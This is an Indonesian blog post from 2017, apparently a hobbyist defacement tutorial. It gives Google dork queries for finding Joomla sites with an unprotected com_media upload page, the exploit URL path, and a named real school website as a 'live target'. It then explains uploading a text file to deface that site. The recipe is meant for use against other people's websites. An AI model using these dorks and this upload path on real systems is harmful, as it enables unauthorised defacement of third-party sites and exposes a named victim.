Senin, 26 Juni 2017

Deface dengan teknik Com_media



Deface dengan teknik Com_media


1. Dorking di google

Dork:

inurl:com_media intext:"Upload"
inurl:com_media intext:"Upload" site:com

Exploit:

/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_images_image_intro&e_name=&asset=com_content&author=created_by&folder=

Contoh:

site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_images_image_intro&e_name=&asset=com_content&author=created_by&folder=

 
2. Cari target

Seperti biasa cari target untuk eksekusi mengexploit websitenya, sebagai contoh saya beri live target.
live target:

http://www.mutareteachers.ac.zw/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_images_image_intro&e_name=&asset=com_content&author=created_by&folder=


3. Upload file

File yang diupload hanya bisa gambar dan berformat .txt ya adik adik. Akses file yang diupload tadi tempatnya dimana kak ? tempatnya di :
site.com/images/namafilemu.txt


4. Done

kurang lebih contoh hasilnya seperti ini gan, gampang kan gan, oh iya agar text bisa lebih bagus agan bisa edit textnya di sini biar text nya terkesan lebih profisional :D



EmoticonEmoticon